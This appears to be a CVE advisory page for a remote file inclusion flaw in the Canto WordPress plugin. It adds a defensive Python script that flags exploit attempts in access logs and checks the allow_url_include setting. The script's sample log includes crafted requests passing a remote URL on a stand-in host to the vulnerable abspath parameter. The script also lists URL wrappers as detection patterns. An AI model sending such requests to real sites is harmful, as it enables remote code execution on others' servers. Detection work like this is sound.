CVE-2024-4936
Published: 14 June 2024
Summary
CVE-2024-4936 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in the Canto plugin for WordPress, published by Canto. Its CVSS base score is 9.8 (Critical).
Operationally, it ranks in the top 6.2% of CVEs by exploit likelihood and is not currently listed in the CISA KEV catalog.
Deeper analysis
The Canto plugin for WordPress is vulnerable to remote file inclusion in all versions through 3.0.8. The flaw exists in the abspath parameter handling within includes/lib/sizes.php and permits an unauthenticated attacker to supply a remote URL that the server will include and execute when the PHP allow_url_include directive is enabled on the target host. The issue carries a CVSS 3.1 score of 9.8.
An unauthenticated network attacker can exploit the vulnerability by sending a crafted request that references a remote file under their control. Successful exploitation results in arbitrary code execution on the web server with the privileges of the web-server process, giving the attacker full control over the affected WordPress site and any data it processes.
Public references from Wordfence and the WordPress plugin Trac indicate that the issue was addressed in a subsequent plugin release; administrators are advised to update to the newest version of the Canto plugin and to ensure allow_url_include remains disabled unless explicitly required.
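Because exploitation depends on two things named above (the abspath parameter reaching includes/lib/sizes.php with a remote URL, and allow_url_include being enabled), a defender can check both. The following Python script is an added example, not code from the advisory or from the Canto plugin: it scans constructed combined-format web-server access log lines for requests to the sizes.php path whose abspath value names a URL wrapper instead of a local path, and parses a php.ini fragment to report whether allow_url_include is on. Only the file name and parameter name come from the advisory; the plugin directory /wp-content/plugins/canto/, the log format, the TEST-NET addresses and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# From the advisory: the vulnerable script and parameter.
VULN_PATH = "includes/lib/sizes.php"
VULN_PARAM = "abspath"

# Stream wrappers that include/require will only open when allow_url_include=On.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php"}
SCHEME_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]+):")  # 2+ chars, so "C:\..." is not a scheme

# Assumed Apache/Nginx "combined"-style access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def allow_url_include_enabled(ini_text: str) -> bool:
    """Return True if a php.ini fragment leaves allow_url_include switched on.

    ';' comments are stripped and the last assignment wins, as in php.ini itself.
    """
    enabled = False
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        if key.strip().lower() == "allow_url_include":
            enabled = val.strip().strip("\"'").lower() in {"1", "on", "true", "yes"}
    return enabled


def is_remote_include_value(value: str) -> bool:
    """True when a parameter value names a URL wrapper rather than a local path."""
    v = unquote(value).strip()      # second decode catches double-encoded values
    if v.startswith("//"):          # protocol-relative URL
        return True
    m = SCHEME_RE.match(v)
    return bool(m) and m.group(1).lower() in REMOTE_SCHEMES


def scan_access_log(lines):
    """Return one finding per request that hands a URL wrapper to the abspath parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith(VULN_PATH):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for val in params.get(VULN_PARAM, []):
            if is_remote_include_value(val):
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "abspath": val,
                })
    return findings


# Constructed sample lines; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Jun/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 2048',
    '203.0.113.11 - - [14/Jun/2024:10:00:02 +0000] "GET /wp-content/plugins/canto/includes/lib/sizes.php?abspath=%2Fvar%2Fwww%2Fhtml HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Jun/2024:10:00:03 +0000] "GET /wp-content/plugins/canto/includes/lib/sizes.php?abspath=http%3A%2F%2F198.51.100.7%2Fs.txt HTTP/1.1" 200 640',
    '198.51.100.8 - - [14/Jun/2024:10:00:04 +0000] "GET /wp-content/plugins/canto/includes/lib/sizes.php?abspath=%2F%2F198.51.100.8%2Fs.txt HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"remote include attempt from {f['ip']} at {f['time']} -> {f['abspath']} (HTTP {f['status']})")
    # Constructed php.ini fragment; a hardened host keeps this Off.
    print("allow_url_include on:", allow_url_include_enabled("allow_url_include = Off"))
```

The path match uses endswith so the rule does not depend on the assumed plugin directory, and the second decode in is_remote_include_value means a double-encoded scheme is still flagged. A local-path value such as /var/www/html is not reported, which is the point: the rule keys on the condition the advisory names, a URL wrapper reaching the include.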
The EPSS score for this CVE rose from a low baseline to a recorded peak of 0.1598, indicating that exploitation interest increased after public disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-44502
Vulnerability details
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. This required allow_url_include to be enabled on the target site in order to exploit.
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.